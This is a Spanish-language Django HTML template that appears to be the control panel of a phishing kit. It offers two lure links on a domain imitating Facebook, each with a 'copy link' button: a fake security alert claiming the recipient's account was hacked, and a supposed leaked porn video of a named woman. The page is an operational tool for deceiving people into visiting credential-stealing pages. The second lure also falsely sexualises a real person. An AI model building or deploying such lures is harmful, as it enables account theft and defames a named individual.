{% extends 'base.html' %}
{% load static %}

        {% block content %}
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>

<script>
function copyToClipboard(elemento) {
  var $temp = $("<input>")
  $("body").append($temp);
  $temp.val($(elemento).text()).select();
  document.execCommand("copy");
  $temp.remove();
}

</script>
<div class="row">
<div class="col">
<div class="card text-center h-90%" style="width: 18rem;">
  <img src="{% static 'img/alert.png' %}" class="card-img-top" alt="...">
  <div class="card-body">
    <h5 class="card-title">Alerta de Seguridad</h5>
    <p class="card-text">Este enlace envia una alerta, de que hackearon su cuenta.</p>
    <p class="d-none" id="p1">https://sdk-facebook.onrender.com/alerta/de/seguridad/</p>
    <a href="#" class="btn btn-primary"  onclick="copyToClipboard('#p1')">Copiar Enlace</a>
  </div>
  </div>
</div>

<div class="col">
<div class="card text-center" style="width: 18rem;">
  <img src="https://img-cf.xvideos-cdn.com/videos/thumbs169l/d8/c5/72/d8c572dec1eec94eb0e992f8d7428b41-2/d8c572dec1eec94eb0e992f8d7428b41.5.jpg"" class="card-img-top" alt="...">
  <div class="card-body">
    <h5 class="card-title">Video Porno Salma Flores</h5>
    <p class="card-text">Este enlace envia un video filtrado de salma flores.</p>
    <p class="d-none" id="p2">https://sdk-facebook.onrender.com/nuevo/video/porno/salma/</p>
    <a href="#" class="btn btn-primary"  onclick="copyToClipboard('#p2')">Copiar Enlace</a>
  </div>
  </div>
</div>




</div>
                  {% endblock %}
